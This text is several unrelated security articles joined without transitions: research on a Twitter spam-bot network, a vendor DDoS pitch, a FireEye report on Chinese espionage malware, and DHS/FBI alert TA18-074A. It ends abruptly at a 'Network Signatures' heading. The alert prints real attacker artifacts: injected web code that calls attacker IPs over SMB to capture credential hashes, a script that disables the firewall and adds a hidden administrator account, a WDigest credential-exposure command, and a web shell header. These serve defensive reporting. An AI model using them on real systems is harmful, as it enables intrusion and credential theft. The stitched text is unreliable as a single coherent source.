About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:

This particular avatar was very commonly used as a profile picture in these accounts.

All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:

  • Check out
  • Check this
  • How do you like my site
  • How do you like me
  • You love it harshly
  • Do you like fast
  • Do you like it gently
  • Come to my site
  • Come in
  • Come on
  • Come to me
  • I want you
  • You want me
  • Your favorite
  • Waiting you
  • Waiting you at

All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:


It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:

“I will ban drugs, spam, porn, etc.” Yeah, right.

My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.

Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.

The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.

My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.

The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.

After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.

Pretty much the same pattern I’d seen after one day of crawling still existed after one week. Just a few of the clusters weren’t “flower” shaped. Here’s a few zooms of the graph.


Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:

Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.

One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:

As you can see, this group has less new accounts in it than older ones. That big spike in the middle of the chart represents accounts that are about six years old. One reason why there are fewer new accounts in this network is because Twitter’s automation seems to be able to flag behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts on the graphs above were restricted or suspended.

Here are a few more breakdowns – Tweets published, likes, followers and following.

Here’s a collage of some of the profile pictures found. I modified a python script to generate this – far better than using one of those “free” collage making tools available on the Internets. 🙂

So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:

Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.

If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same github repo.

The US Government Vs Botnets

U.S. government agencies are working hard to solve the problem of botnets and other cyber threats, and are asking for input from various stakeholders. In July 2017 the National Institute of Standards and Technology (NIST) conducted a Workshop on “Enhancing Resilience of the Internet and Communications Ecosystem.” The proceedings of that workshop were published as NISTIR 8192, "Enhancing Resilience of the Internet and Communications Ecosystem: A NIST Workshop Proceedings." Then, in early January the US Secretary of Commerce and Secretary of Homeland Security submitted A Report to the President on Enhancing the Resilience of the Internet and Communications Ecosystem against Botnets and Other Automated, Distributed Threats.”

To follow up on that report, which was open to public comments for 30 days, the National Institute of Standards and Technology (NIST) conducted a 2nd workshop, called “Enhancing Resilience of the Internet & Communications.” The workshop was held February 28-March 1 at NIST’s National Cybersecurity Center of Excellence (NCCEO) in Rockville, Maryland.

The workshop discussed substantive public comments, including open issues, on the draft report about actions to address automated and distributed threats to the digital ecosystem as part of the activity directed by Executive Order 13800, “Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure.” According to the NIST website, “The Departments of Commerce and Homeland Security seek to engage all interested stakeholders—including private industry, academia, civil society, and other security experts—on the draft report, its characterization of the threat landscape, the goals laid out, and the actions to further these goals.” A final report from the departments of Homeland Security and Commerce, incorporating comments and other feedback received, is due to President Trump on May 11, 2018.

These workshops and reports are important steps in the right direction. It seems quite clear to various stakeholders across industry and government sectors that industry-government collaboration is essential to thwart cyber security threats. For starters, government can walk the talk by implementing best security practices and technologies in its operations, whether at federal or state levels. In addition, government can influence the marketplace via regulations and policies that are designed to make the Internet safer. For example, government may mandate that manufacturers build in tighter security for IoT devices, to make it harder for hackers to recruit those devices into botnets. Another possibility is that the government may impose regulations on Internet service providers, requiring them to provide protection from DDoS attacks, for example.

The Departments of Commerce and Homeland Security response to the Presidents’ Executive Order calls for businesses to improve their resilience to DDoS attacks. Corero released the “Government Response to Rise in IoT DDoS Botnet Threats” Solution Brief to detail how our solutions help our customers defend themselves against all DDoS attacks and to answer business and consumer requests for better protection from cyber threats. In general, businesses and consumers have influenced the marketplace by asking for (or in some ways, demanding) better protection from cyber threats. Competition inspires vendors to offer better solutions, and enterprises to adopt those solutions. For the sake of risk management, many companies have already taken steps to increase cyber security. And many telecommunications companies have responded to the market demand for DDoS protection, by offering DDoS protection as a service to their customers. On the other hand, some enterprises don’t understand the risks of DDoS attacks or take steps to mitigate them; the government can’t regulate or police all enterprises. If a major website gets attacked (perhaps a bank, or a hospital) and it impacts thousands of civilians, then both civilians and the enterprise are victimized. A case in point was the massive DDoS attack against Dyn, which impacted millions of end-users.

It’s crucial that the U.S. government take steps to advance cyber security. It can’t do it alone, however. When safeguarding the Internet for all users, a multi-stakeholder approach is essential. Though the government can help reduce IoT botnets, it cannot completely eliminate them, partly because the U.S. government can’t completely control what manufacturers do and what end-users do, especially in other countries. No one can assume that vendors around the world will bake in better security for IoT devices, or change their default passwords or update devices with security patches. No matter how heavily IoT devices are regulated or how many consumers are educated, millions of such devices around the world will still be unsecured and vulnerable to being recruited into a botnet.

Read Corero’s Government Response to Rise in IoT DDoS Botnet Threats Solution Brief to learn how our DDoS Defense solutions solve the problem of botnet-driven DDoS attacks. We have been a leader in DDoS protection solutions for over a decade, contact us to learn more about how we can help protect your network from all DDoS attacks.

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.


The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.







HOMEFRY, a 64-bit Windows password dumper/cracker



MURKYTOP, a command-line reconnaissance tool 



AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators






AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages



Beacon, a commercially available backdoor



PHOTO, also reported as Derusbi



BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

TA18-074A: Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors

Original release date: March 15, 2018 | Last revised: March 16, 2018

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers


This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.


Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.


Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.


Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]


Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.


<img src="[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />


In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:


var i = document.createElement("img");

i.src = "file[:]//184.154.150[.]66/ame_icon.png";

i.width = 3;



Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.


Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1]


Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.


Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.


Contents of symantec_help.jsp


<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<enu.cmd>\""); %>


The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English.


Contents of enu.cmd


netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 100 /f

net user MS_BACKUP <Redacted_Password> /add

net localgroup Administrators /add MS_BACKUP

net localgroup Administradores /add MS_BACKUP

net localgroup Amministratori /add MS_BACKUP

net localgroup Administratoren /add MS_BACKUP

net localgroup Administrateurs /add MS_BACKUP

net localgroup "Remote Desktop Users" /add MS_BACKUP

net user MS_BACKUP /expires:never

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MS_BACKUP /t REG_DWORD /d 0 /f

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

sc config termservice start= auto

net start termservice


DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:

Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.

Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.

Account 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).

Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks.


Scheduled Task

In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours.


VPN Software

After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks.


Password Cracking Tools

Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publically available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\.



Once inside of an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.

In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:

  • The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.
  • The files were renamed to new extensions, with INST.txt being renamed INST.exe.
  • The files were executed on the host and then immediately deleted.
  • The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.
  • The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key.


Persistence Through .LNK File Manipulation

The threat actors manipulated LNK files, commonly known as a Microsoft Window’s shortcut file, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.

Four of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:

Parsed content of one of the LNK files

Parsed output for file: desktop.ini.lnk

Registry Modification

The threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor executed the following command.


reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f


Stage 6: Command and Control

The threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells. The difference between the two groups was the “public string Password” field.


Beginning Contents of the Web Shell


<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>

<%@ import Namespace="System"%>

<%@ import Namespace="System.IO"%>

<%@ import Namespace="System.Diagnostics"%>

<%@ import Namespace="System.Data"%>

<%@ import Namespace="System.Management"%>

<%@ import Namespace="System.Data.OleDb"%>

<%@ import Namespace="Microsoft.Win32"%>

<%@ import Namespace="System.Net.Sockets" %>

<%@ import Namespace="System.Net" %>

<%@ import Namespace="System.Runtime.InteropServices"%>

<%@ import Namespace="System.DirectoryServices"%>

<%@ import Namespace="System.ServiceProcess"%>

<%@ import Namespace="System.Text.RegularExpressions"%>

<%@ Import Namespace="System.Threading"%>

<%@ Import Namespace="System.Data.SqlClient"%>

<%@ import Namespace="Microsoft.VisualBasic"%>

<%@ Import Namespace="System.IO.Compression" %>

<%@ Assembly Name="System.DirectoryServices,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.Management,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.ServiceProcess,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">

<script runat = "server">

public string Password = "<REDACTED>";

public string z_progname = "z_WebShell";



Stage 7: Actions on Objectives

DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets.


Internal Reconnaissance

Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim’s network.

Once on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller typically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:

  • admins.txt
  • completed_dclist.txt
  • completed_trusts.txt
  • completed_zone.txt
  • comps.txt
  • conditional_forwarders.txt
  • domain_zone.txt
  • enum_zones.txt
  • users.txt

The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “” and “”.

The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.

In at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to “ps.exe”.

  1. The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.
  2. The directory “out” is created in the user’s %AppData% folder.
  3. PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.
  4. The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s C:\Windows\Temp directory with a “.jpg” extension.
  5. The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed.
  6. In one instance, DHS observed an “” file created.

DHS observed the threat actors create and modify a text document labeled “ip.txt” which is believed to have contained a list of host information. The threat actors used “ip.txt” as a source of hosts to perform additional reconnaissance efforts. In addition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being executed. In one instance, “res.txt” contained output from the Windows’ command “query user” across the network.


Using <Username> <Password>
Running -s cmd /c query user on <Hostname1>
Running -s cmd /c query user on <Hostname2>
Running -s cmd /c query user on <Hostname3>
<user1>                                              2       Disc       1+19:34         6/27/2017 12:35 PM


An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.

In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two instances, the scheduled tasks were designed to run the command “C:\Windows\Temp\scr.exe” with the argument “C:\Windows\Temp\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from the local administrator’s “AppData\Local\Microsoft\” folder.

The threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some common directory names were

  • Chromex64,
  • Microsoft_Corporation,
  • NT,
  • Office365,
  • Temp, and
  • Update.


Targeting of ICS and SCADA Infrastructure

In multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).

The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed.

This image depicts a reconstructed screenshot of a Human Machine Interface (HMI) system that was accessed by the threat actor. This image demonstrates the threat actor's focus and interest in Industrial Control System (ICS) environments.


Cleanup and Cover Tracks

In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.

Threat actors cleaned up intended target networks through deleting created screenshots and specific registry keys. Through forensic analysis, DHS determined that the threat actors deleted the registry key associated with terminal server client that tracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents and any tools they brought into the environment such as “scr.exe”.


Detection and Response

IOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these threat actors.


Network Signatures and Host-Based Rules

This section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains.


Network Signatures

